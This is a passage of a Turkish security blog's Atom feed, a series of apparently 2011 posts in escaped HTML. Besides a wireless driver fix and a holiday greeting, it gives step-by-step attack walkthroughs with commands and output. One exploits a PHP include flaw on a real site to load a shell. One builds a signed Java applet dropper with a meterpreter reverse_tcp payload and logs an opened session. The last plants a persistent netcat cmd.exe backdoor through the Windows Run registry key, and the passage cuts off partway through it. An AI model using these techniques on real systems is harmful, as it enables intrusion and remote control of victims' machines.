varsayılan olarak yüklemek için ;&lt;br /&gt;&lt;br /&gt;Sürücüyü manuel yüklemek için ;&lt;br /&gt;&lt;pre class="brush:php"&gt;root@bt:~# modprobe rtl8187&lt;br /&gt;&lt;/pre&gt;Sürücüyü manuel boşaltmak için ;&lt;br /&gt;&lt;pre class="brush:php"&gt;root@bt:~# rmmod rtl8187&lt;br /&gt;&lt;/pre&gt;Tüm mac80211 yığınlarını boşaltmak için&lt;br /&gt;&lt;pre class="brush:php"&gt;root@bt:~# rmmod mac80211&lt;br /&gt;root@bt:~# rmmod cfg80211&lt;br /&gt;root@bt:~# rmmod rfkill&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;SIOCSIFFLAGS Unknown error 132 ( hatası ve çözümü )&lt;br /&gt;&lt;br /&gt;VMware ortamında wireless kartınızı aktif etmeye çalışırken "rtl8187: wireless radio switch turned off", "ioctl(SIOCSIFFLAGS) failed: Unknown error 132" ve "rtl8187 - [phy0]SIOCSIFFLAGS: Unknown error 132" &lt;br /&gt;hataları ile sık sık kaşılaşırsınız bunun sebebi ise kartın kitli olmasından kaynaklı olacaktır . Bu sorunu çözebilmek için ;&lt;br /&gt;&lt;br /&gt;Aşağıdaki Komutları vermeniz yeterli olacaktır;&lt;br /&gt;&lt;pre class="brush:php"&gt;rmmod rtl8187&lt;br /&gt;rfkill block all&lt;br /&gt;rfkill unblock all&lt;br /&gt;modprobe rtl8187&lt;br /&gt;rfkill unblock all&lt;br /&gt;ifconfig wlan0 up&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;R8187 chipsetli karlar için ise aşağıdaki komutları kullanmanız gerekecek;&lt;br /&gt;&lt;pre class="brush:php"&gt;rmmod rtl8187&lt;br /&gt;rmmod mac80211&lt;br /&gt;rmmod cfg80211&lt;br /&gt;rmmod rfkill&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Bu döküman FreWaL tarafından yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-4569091385218970786?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/4569091385218970786/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/06/siocsifflags-failed-unknown-error-132.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4569091385218970786'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4569091385218970786'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/06/siocsifflags-failed-unknown-error-132.html' title='(SIOCSIFFLAGS) failed: Unknown error 132 hatası ve çözümü'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-5151156602052986374</id><published>2011-06-05T04:49:00.000-07:00</published><updated>2011-06-05T04:59:36.879-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='file'/><category scheme='http://www.blogger.com/atom/ns#' term='include'/><category scheme='http://www.blogger.com/atom/ns#' term='local'/><title type='text'>Local Path include Güvenlik Zahafiyeti</title><content type='html'>Sistemlerde Masum görünen ufak kodlar büyük açıklara sebebiyet verebiliyor. Çoğu kişiye ismi değişik gelsede zaman zaman denk geldiğim Local Path include zahafiyetinden bahsetmek istiyorum&amp;nbsp; . Geçenlerde bir sitenin güvenliği test ederken barındığı makinenin iyi yapılandırılmış olduğunu gördüm . Sistem iyi optimize edilmişti çünkü güncellemeleri sağlamdı , yinede bazı zahafiyetler aracılığı ile sistem dosyaları okunabiliyordu yazma izni ise yoktu .&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;Siteye kısa bir göz gezdirdikten sonra Hedef sitedeki ufak bir link yapısı gözüme ilişti&lt;br /&gt;index.php?sayfa=iletisim &lt;br /&gt;Sözde codırcıkların yaptığı yanlış bundada mevcutmu diyerek hata verdirme yoluna gittim.&lt;br /&gt;index2.php?sayfa='&amp;nbsp; // Tabi düşündüğüm gibi çıktı.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;Warning: include(\'.php) [function.include]: failed to open stream: No such file or directory in /home/XXX/public_html/index.php on line 54&lt;br /&gt;&lt;br /&gt;Warning: include(\'.php) [function.include]: failed to open stream: No such file or directory in /home/XXX/public_html/index.php on line 54&lt;br /&gt;&lt;br /&gt;Warning: include() [function.include]: Failed opening '\'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXX/public_html/index.php on line 54&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Çoğunuza masum gelen bu hatadan bahsetmek istiyorum. Bu siteyi yapan arkadaş include fonksiyonu ile dosyaları okutmuş ve demişki benim ismini verdiğim dosyanın sonuna .php koyarak oku.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;Failed opening '\'.php' &lt;/pre&gt;// mantıken olay şöyle oluyor. Link yapısını hatırlıyorsunuz ; index.php?sayfa=iletisim&lt;br /&gt;Sunucu kontrol edildiği zaman iletisim.php adında bir dosyanında aynı dizinde olduğunu görüyoruz. yani arkadaş öyle bir fonksiyon kullanmışki&amp;nbsp; index.php?sayfa=iletisim şeklinde linke giriş yapıldığı zaman sistem onu&amp;nbsp; index.php?sayfa=iletisim.php şeklinde algılıyor ve çıktı veriyor. Ancak herhangi bir filtreleme varmı yokmu bilmediğim için sisteme müdahale edemiyordum.&lt;br /&gt;Tabi o dosyayı okudum ;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;&amp;lt;?php&lt;br /&gt;    if(isset($_REQUEST['sayfa'])){&lt;br /&gt;        include $_REQUEST['sayfa'].".php";&lt;br /&gt;    } else {&lt;br /&gt;        include "anasayfa.php";&lt;br /&gt;     }&lt;br /&gt;?&amp;gt; &lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;phpden anlayan arkadaşlar saçmalıklar komedyasını ilk bakışta anlamışlardır. zira bu arkadaş&amp;nbsp; şu&amp;nbsp; ".php"; kısmıda kullanmamış olsa remote file include açığıda verecek.&lt;br /&gt;&lt;br /&gt;Fonksiyon include $_REQUEST['sayfa'].".php";&amp;nbsp; şeklinde kullanıldığı için uzak sunucudan okutmaya imkan tanımıyordu . Peki ne yapılabilirdi ? Öncelikle kendi bulunduğumuz dizindeki php dosyasını sunucudaki farklı bir usere okutabilmek için kendi dizinimize full yetki vermemiz gerekiyordu. ( chmod 777 )&lt;br /&gt;şimdi kendi Local Path konumumuzu muhafaza edelim örneğin : /home/saldirgan/public_html/shell.php&lt;br /&gt;hemen ardından yapılacak ufak bir url include işlemi ;&lt;br /&gt;&lt;pre class="brush:php"&gt;index.php?sayfa=/home/saldirgan/public_html/shell&lt;br /&gt;&lt;br /&gt;URL İnclude işlemi ile sistem onu include "/home/saldirgan/public_html/shell.php"; şeklinde tanımayacak ve çıktı verecek.&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;Ve artık full yetki ile o siteye erişimi kendimize açmış olduk ve hedef sistemi full yetki ile bypass etmeyi başardık.&lt;br /&gt;&lt;br /&gt;Bu Döküman Güvenlik Amacı ile FreWaL Tarafından yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-5151156602052986374?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/5151156602052986374/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/06/local-path-include-guvenlik-zahafiyeti.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/5151156602052986374'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/5151156602052986374'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/06/local-path-include-guvenlik-zahafiyeti.html' title='Local Path include Güvenlik Zahafiyeti'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-4201245758272172704</id><published>2011-06-04T05:46:00.000-07:00</published><updated>2011-06-04T12:00:32.574-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='java'/><category scheme='http://www.blogger.com/atom/ns#' term='java applet'/><title type='text'>MSF ile Java Applet Infected işlemi.</title><content type='html'>Günümüzde pc'sinde java bulundurmayan pek az insan kalmıştır . Bugunkü konumuzda msf yardımı ile java applet Infected işlemini göreceğiz. Not : Bu yazı tamamen güvenlik amaçlıdır.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Infected işlemi illa msf ile yapılacak diye bişey yok bizimkisi işlem kolaylaştırmadan kaynaklanıyor. Konumuza girişelim ,&lt;br /&gt;Öncelikle java sdk kurulu değil ise kurmanız gerekiyor. Aksi halde derleme işlemini yapamazsınız. &lt;br /&gt;Ubuntu için : apt-get install sun-java6-jdk&lt;br /&gt;Centos için : yum install sun-java6-jdk&lt;br /&gt;Kurulum dağarcığı bulunmayan işletim sistemleri için manuel kurulum gerçekleştirmeniz gerekecek.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Nasıl derleyecez ne komut kullanacaz gibisi dertlerden sizi kurtaracak bash scriptide veriyorum.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:bash"&gt;#!/bin/bash&lt;br /&gt;#   &lt;br /&gt;#   Shell script to sign a Java Applet   &lt;br /&gt;#   Joshua "Jabra" Abraham  &lt;jabra@spl0it.org&gt;&lt;br /&gt;#   Tue Jun 30 02:26:36 EDT 2009&lt;br /&gt;#&lt;br /&gt;#   1. Compile the Applet source code to an executable class. &lt;br /&gt;#&lt;br /&gt;#       javac HelloWorld.java&lt;br /&gt;#&lt;br /&gt;#   2. Package the compiled class into a JAR file.&lt;br /&gt;#&lt;br /&gt;#       jar cvf HelloWorld.jar HelloWorld.class&lt;br /&gt;#&lt;br /&gt;#   3. Generate key pairs. &lt;br /&gt;#&lt;br /&gt;#       keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass&lt;br /&gt;#&lt;br /&gt;#   4. Sign the JAR file. &lt;br /&gt;#&lt;br /&gt;#       jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar  SignedHelloWorld.jar HelloWorld.jar signapplet&lt;br /&gt;#&lt;br /&gt;#   5. Export the public key certificate. &lt;br /&gt;#&lt;br /&gt;#       keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer&lt;br /&gt;#&lt;br /&gt;#   6. Deploy the JAR and the class file. &lt;br /&gt;#&lt;br /&gt;#       &lt;applet archive="SignedHelloWorld.jar" code="HelloWorld.class" height="1" width="1"&gt; &lt;/applet&gt;&lt;br /&gt;#&lt;br /&gt;echo "Lütfen dizindeki java ismini giriniz (.java uzantısı olmadan ) :"&lt;br /&gt;read NAME&lt;br /&gt;javac $NAME.java&lt;br /&gt;if [ $? -eq 1 ] ; then&lt;br /&gt;    echo "javac hatası."&lt;br /&gt;    exit&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;echo "[+] Packaging the compiled class into a JAR file"&lt;br /&gt;echo "&lt;br /&gt;##################################################################################################&lt;br /&gt;# Örnek Kullanım :                                                                              &lt;br /&gt;# What is your first and last name? ( Ad Soyad )&lt;br /&gt;#  [Unknown]:  MSFcmd&lt;br /&gt;# What is the name of your organizational unit? ( Organizasyon )&lt;br /&gt;#  [Unknown]:  Java Inc.&lt;br /&gt;# What is the name of your organization? ( Organizasyon )&lt;br /&gt;#  [Unknown]:  Java Organization&lt;br /&gt;# What is the name of your City or Locality? ( Şehir )&lt;br /&gt;#  [Unknown]:  Redmond&lt;br /&gt;# What is the name of your State or Province? ( Konum )&lt;br /&gt;#  [Unknown]:  Washington&lt;br /&gt;# What is the two-letter country code for this unit?&lt;br /&gt;#  [Unknown]:  yes&lt;br /&gt;# Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=yes correct?&lt;br /&gt;#  [no]:  yes&lt;br /&gt;##################################################################################################&lt;br /&gt;"&lt;br /&gt;jar cf $NAME.jar $NAME.class&lt;br /&gt;if [ $? -eq 1 ] ; then&lt;br /&gt;    echo "Error with jar"&lt;br /&gt;    exit&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;echo "[+] Generating key pairs"&lt;br /&gt;keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass&lt;br /&gt;if [ $? -eq 1 ] ; then&lt;br /&gt;    echo "Error with generating the key pair"&lt;br /&gt;    exit&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;echo "[+] Signing the JAR file"&lt;br /&gt;jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar  "Signed$NAME.jar" $NAME.jar signapplet&lt;br /&gt;if [ $? -eq 1 ] ; then&lt;br /&gt;    echo "Error with signing the jar"&lt;br /&gt;    exit&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;echo "[+] Exporting the public key certificate"&lt;br /&gt;keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer&lt;br /&gt;if [ $? -eq 1 ] ; then&lt;br /&gt;    echo "Error with exporting the public key"&lt;br /&gt;    exit&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;echo "[+] Done"&lt;br /&gt;sleep 1&lt;br /&gt;echo ""&lt;br /&gt;echo ""&lt;br /&gt;echo "Deploy the JAR and certificate files. They should be deployed to a distribution directory on a Web server. "&lt;br /&gt;echo ""&lt;br /&gt;echo "&lt;applet archive="Signed$NAME.jar" code="$NAME.class" height="1" width="1"&gt; &lt;/applet&gt;" &lt;br /&gt;echo ""&lt;br /&gt;&lt;/jabra@spl0it.org&gt;&lt;/pre&gt;&lt;br /&gt;Fazla kuru kalabalıktan kurtulmak için boş bir dizin açalım. ve içersine gidelim.&lt;br /&gt;&lt;br /&gt;root@bt : mkdir java &amp;amp;&amp;amp; cd java&lt;br /&gt;&lt;br /&gt;nano komutu kullanarak MSFcmd.java adında bir dosya oluşturalım ve verdiğim kodları içersine yazdıktan sora dosyadan çıkış yapalım.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:bash"&gt;import java.applet.*;&lt;br /&gt;import java.awt.*;&lt;br /&gt;import java.io.*;&lt;br /&gt;public class MSFcmd extends Applet {&lt;br /&gt;public void init() {&lt;br /&gt;Process f;&lt;br /&gt;String first = getParameter("first");&lt;br /&gt;try {&lt;br /&gt;f = Runtime.getRuntime().exec("first");&lt;br /&gt;}&lt;br /&gt;catch(IOException e) {&lt;br /&gt;e.printStackTrace();&lt;br /&gt;}&lt;br /&gt;Process s;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Buraya kadar işlem başarı ile gerçekleştirildi. şimdi nano komutu ile javabuild.sh adında bir dosya açalım ve yukarda verdiğim bash script kodlarını içersine kopyalayalım. ( bilmeyen arkadaşlar için söylüyorum bash scriptin adı illaki javabuild olacak diye bişe yok. )&lt;br /&gt;&lt;br /&gt;bulunduğunuz dizinde ; bash javabuild.sh yada ./javabuild.sh şeklinde çalıştıralım.&lt;br /&gt;Script ingilizce olduğu için türkçe örnek kullanım alanı ekledim . &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;root@bt:~/Desktop/Exploit/java/applet# bash javabuild.sh&lt;br /&gt;Lütfen dizindeki java ismini giriniz (.java uzantısı olmadan ) :&lt;br /&gt;MSFcmd&lt;br /&gt;[+] Packaging the compiled class into a JAR file&lt;br /&gt;&lt;br /&gt;##################################################################################################&lt;br /&gt;# Örnek Kullanım :                                                                              &lt;br /&gt;# What is your first and last name? ( Ad Soyad )&lt;br /&gt;#  [Unknown]:  MSFcmd&lt;br /&gt;# What is the name of your organizational unit? ( Organizasyon )&lt;br /&gt;#  [Unknown]:  Microsoft&lt;br /&gt;# What is the name of your organization? ( Organizasyon )&lt;br /&gt;#  [Unknown]:  Microsoft Organization&lt;br /&gt;# What is the name of your City or Locality? ( Şehir )&lt;br /&gt;#  [Unknown]:  Redmond&lt;br /&gt;# What is the name of your State or Province? ( Konum )&lt;br /&gt;#  [Unknown]:  Washington&lt;br /&gt;# What is the two-letter country code for this unit?&lt;br /&gt;#  [Unknown]:  yes&lt;br /&gt;# Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=yes correct?&lt;br /&gt;#  [no]:  yes&lt;br /&gt;##################################################################################################&lt;br /&gt;&lt;br /&gt;[+] Generating key pairs&lt;br /&gt;What is your first and last name?&lt;br /&gt;  [Unknown]:  Bili Amca&lt;br /&gt;What is the name of your organizational unit?&lt;br /&gt;  [Unknown]:  Java Inc.&lt;br /&gt;What is the name of your organization?&lt;br /&gt;  [Unknown]:  Java Inc.&lt;br /&gt;What is the name of your City or Locality?&lt;br /&gt;  [Unknown]:  America&lt;br /&gt;What is the name of your State or Province?&lt;br /&gt;  [Unknown]:  Amerika&lt;br /&gt;What is the two-letter country code for this unit?&lt;br /&gt;  [Unknown]:  yes&lt;br /&gt;Is CN=Bili Amca, OU=Java Inc., O=Java Inc., L=America, ST=Amerika, C=yes correct?&lt;br /&gt;  [no]:  yes&lt;br /&gt;&lt;br /&gt;[+] Signing the JAR file&lt;br /&gt;&lt;br /&gt;Warning: &lt;br /&gt;The signer certificate will expire within six months.&lt;br /&gt;[+] Exporting the public key certificate&lt;br /&gt;Certificate stored in file &lt;mycertificate.cer&gt;&lt;br /&gt;[+] Done&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Deploy the JAR and certificate files. They should be deployed to a distribution directory on a Web server. &lt;br /&gt;&lt;br /&gt;&lt;applet archive="SignedMSFcmd.jar" code="MSFcmd.class" height="1" width="1"&gt; &lt;/applet&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/mycertificate.cer&gt;&lt;/pre&gt;&lt;br /&gt;Şuanda build işlemi başarı ile gerçekleşti derlenmiş applet işlemi yaptığınız dizinde oluşturuldu.&lt;br /&gt;&lt;br /&gt;-rwxr-xr-x 1 root root 3105 2011-06-04 15:14 javabuild.sh&lt;br /&gt;-rw-r--r-- 1 root root&amp;nbsp; 615 2011-06-04 15:23 MSFcmd.class&lt;br /&gt;-rw-r--r-- 1 root root&amp;nbsp; 858 2011-06-04 15:23 MSFcmd.jar&lt;br /&gt;-rw-r--r-- 1 root root&amp;nbsp; 274 2011-06-04 14:37 MSFcmd.java&lt;br /&gt;-rw-r--r-- 1 root root&amp;nbsp; 793 2011-06-04 15:24 mycertificate.cer&lt;br /&gt;-rw-r--r-- 1 root root 1268 2011-06-04 15:24 mykeystore&lt;br /&gt;-rw-r--r-- 1 root root 2153 2011-06-04 15:24 SignedMSFcmd.jar&lt;br /&gt;&lt;br /&gt;Buraya kadar işlem tamam . şimdi gerekli dosyaları hostmuza gönderelim. Ben işlemi local gerçekleştirdiğim için localhost üzerinden işlem yapacağım.Aynı dizinde oluşan SignedMSFcmd.jar ve MSFcmd.class dosyasını hostumuza gönderelim testi local yapıyorsanız cp komutunu kullanabilirsiniz . Hemen ardından msfpayload generatorü kullanarak ters bağlantı için exe'mizi oluşturalım.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;root@bt:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 R | ./msfencode -t exe -o ben.exe&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Buraya kadar işlem tamam ise son olarak html dosyamızı oluşturmamız gerekiyor.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;HTML Kaynağını alttaki URL den alınız.&lt;br /&gt;http://pastebin.com/pYWibqZu&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Html içersindeki ben.exe ve http://192.168.1.3/ben.exe kısmını kendinize göre düzenleyiniz.ve Hostunuza yükleyiniz. kurbanı URL ye çekmeden önce multi handleri kullanarak bağlantıları dinlemeye almamız gerekiyor.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;msf &amp;gt; use exploit/multi/handler&lt;br /&gt;msf exploit(handler) &amp;gt; set ExitOnSession false&lt;br /&gt;ExitOnSession =&amp;gt; false&lt;br /&gt;msf exploit(handler) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;PAYLOAD =&amp;gt; windows/meterpreter/reverse_tcp&lt;br /&gt;msf exploit(handler) &amp;gt; set LHOST 192.168.1.3&lt;br /&gt;LHOST =&amp;gt; 192.168.1.3&lt;br /&gt;msf exploit(handler) &amp;gt; set LPORT 4444&lt;br /&gt;LPORT +&amp;gt; 4444&lt;br /&gt;msf exploit(handler) &amp;gt; save&lt;br /&gt;Saved configuration to: /root/.msf3/config&lt;br /&gt;msf exploit(handler) &amp;gt; exploit -j&lt;br /&gt;[*] Exploit running as background job.&lt;br /&gt;[*] Started reverse handler&lt;br /&gt;[*] Starting the payload handler...&lt;br /&gt;&lt;br /&gt; msf exploit(handler) &amp;gt;&lt;br /&gt; [*] Sending stage   (718336 bytes)&lt;br /&gt; [*] Meterpreter session 1 opened (192.168.1.4:4444 -&amp;gt; 192.168.1.4:44477)&lt;br /&gt; msf exploit(handler) &amp;gt; oyun bitti.&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;session açıldı ve artık makinadayız.&lt;br /&gt;&lt;br /&gt;Bu döküman Güvenlik amacı ile FreWaL Tarafından yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-4201245758272172704?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/4201245758272172704/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/06/msf-ile-java-applet-infected-islemi.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4201245758272172704'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4201245758272172704'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/06/msf-ile-java-applet-infected-islemi.html' title='MSF ile Java Applet Infected işlemi.'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-1035974072845594839</id><published>2011-06-02T15:43:00.001-07:00</published><updated>2011-06-02T15:43:36.456-07:00</updated><title type='text'>Kandiliniz Mübarek olsun.</title><content type='html'>Bu gece kandil gecesi cümleten hayırlara vesile olması dileği ile.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-1035974072845594839?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/1035974072845594839/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/06/kandiliniz-mubarek-olsun.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1035974072845594839'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1035974072845594839'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/06/kandiliniz-mubarek-olsun.html' title='Kandiliniz Mübarek olsun.'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-4822926830146256229</id><published>2011-06-02T02:41:00.000-07:00</published><updated>2011-06-02T02:48:53.159-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='backdoor'/><category scheme='http://www.blogger.com/atom/ns#' term='netcat'/><title type='text'>Netcat ile Kalıcı Backdoor (  )</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-6QVk6KPCfxc/TedWuhympeI/AAAAAAAAABk/E0wePQTD6zQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;Bugunkü yazımızda uzak sunucular hakkında bilgi ararken ana sisteme netcat infected ederek güvenlik duvarını bypass etmeyi göreceğiz. Not : Bu yazı içersindeki herşey güvenlik amaçlıdır .&lt;br /&gt;Bu işlemi gerçekleştirebilmek için yapmamız gereken ilk işlem msf'de upload komutu ile netcatı kök sunucuya göndermek olacaktır.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;meterpreter &amp;gt; upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32&lt;br /&gt;[*] uploading  : /tmp/nc.exe -&amp;gt; C:\windows\system32&lt;br /&gt;[*] uploaded   : /tmp/nc.exe -&amp;gt; C:\windows\system32\nc.exe&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;bt gerekli tools'ları içersinde zaten bulunduruyor.netcatı indirmek için ek bir çaba gerektirmiyor.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-hWHZkJubbi0/TedVFsRhWtI/AAAAAAAAABg/dJwwkcULsIg/s1600/1x.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-hWHZkJubbi0/TedVFsRhWtI/AAAAAAAAABg/dJwwkcULsIg/s320/1x.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Bu işlemin hemen ardından netcat'ın sistem üzerinde pc'nin her açılışında çalışarak 455 nolu portu dinlemesini sağlamak için kayıt defterinde 'HKLM\software\microsoft\windows\currentversion\run' konumuna girdisini gerçekleştiriyoruz.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;meterpreter &amp;gt; reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run&lt;br /&gt;Enumerating: HKLM\software\microsoft\windows\currentversion\run&lt;br /&gt;&lt;br /&gt;  Keys(1):&amp;nbsp;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;OptionalComponents&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;Values(1):&lt;br /&gt;&amp;nbsp;&lt;br /&gt;egui&lt;br /&gt;&lt;br /&gt;meterpreter &amp;gt; reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'&lt;br /&gt;Successful set nc.&lt;br /&gt;meterpreter &amp;gt; reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc&lt;br /&gt;Key: HKLM\software\microsoft\windows\currentversion\Run&lt;br /&gt;Name: nc&lt;br /&gt;Type: REG_SZ&lt;br /&gt;Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-6QVk6KPCfxc/TedWuhympeI/AAAAAAAAABk/E0wePQTD6zQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="232" src="http://4.bp.blogspot.com/-6QVk6KPCfxc/TedWuhympeI/AAAAAAAAABk/E0wePQTD6zQ/s640/1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bu sayede güvenlik duvarı geçişe ister istemez izin verecek. Zira Güvenlik duvarı kapalı konuma düşecek.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;meterpreter &amp;gt; execute -f cmd -i&lt;br /&gt;Process 1604 created.&lt;br /&gt;Channel 1 created.&lt;br /&gt;Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;C:\Documents and Settings\Administrator&amp;gt;netsh firewall show opmode&lt;br /&gt;&lt;br /&gt;Etki Alanı profil 